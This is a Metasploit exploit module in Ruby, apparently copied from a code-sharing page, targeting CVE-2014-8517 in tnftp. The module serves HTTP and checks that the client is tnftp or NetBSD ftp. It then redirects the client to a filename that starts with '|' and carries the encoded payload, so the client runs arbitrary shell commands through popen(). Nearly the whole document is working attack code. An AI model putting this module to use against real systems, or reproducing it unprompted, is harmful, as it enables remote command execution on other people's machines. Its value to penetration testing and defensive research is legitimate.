Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer
10
  include Msf::Auxiliary::Report
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name' => 'tnftp "savefile" Arbitrary Command Execution',
15
      'Description' => %q{
16
        This module exploits an arbitrary command execution vulnerability in
17
        tnftp's handling of the resolved output filename - called "savefile" in
18
        the source - from a requested resource.
19

20
        If tnftp is executed without the -o command-line option, it will resolve
21
        the output filename from the last component of the requested resource.
22

23
        If the output filename begins with a "|" character, tnftp will pass the
24
        fetched resource's output to the command directly following the "|"
25
        character through the use of the popen() function.
26
      },
27
      'Author' => [
28
        'Jared McNeill', # Vulnerability discovery
29
        'wvu' # Metasploit module
30
      ],
31
      'References' => [
32
        ['CVE', '2014-8517'],
33
        ['URL', 'https://seclists.org/oss-sec/2014/q4/459']
34
      ],
35
      'DisclosureDate' => '2014-10-28',
36
      'License' => MSF_LICENSE,
37
      'Platform' => 'unix',
38
      'Arch' => ARCH_CMD,
39
      'Privileged' => false,
40
      'Payload' => {'BadChars' => '/'},
41
      'Targets' => [['ftp(1)', {}]],
42
      'DefaultTarget' => 0
43
    ))
44
  end
45

46
  def on_request_uri(cli, request)
47
    unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/
48
      print_status("#{request['User-Agent']} connected")
49
      send_not_found(cli)
50
      return
51
    end
52

53
    if request.uri.ends_with?(sploit)
54
      send_response(cli, '')
55
      print_good("Executing `#{payload.encoded}'!")
56
      report_vuln(
57
        :host => cli.peerhost,
58
        :name => self.name,
59
        :refs => self.references,
60
        :info => request['User-Agent']
61
      )
62
    else
63
      print_status("#{request['User-Agent']} connected")
64
      print_status('Redirecting to exploit...')
65
      send_redirect(cli, sploit_uri)
66
    end
67
  end
68

69
  def sploit_uri
70
    (get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +
71
      Rex::Text.uri_encode(sploit, 'hex-all')
72
  end
73

74
  def sploit
75
    "|#{payload.encoded}"
76
  end
77
end
78

79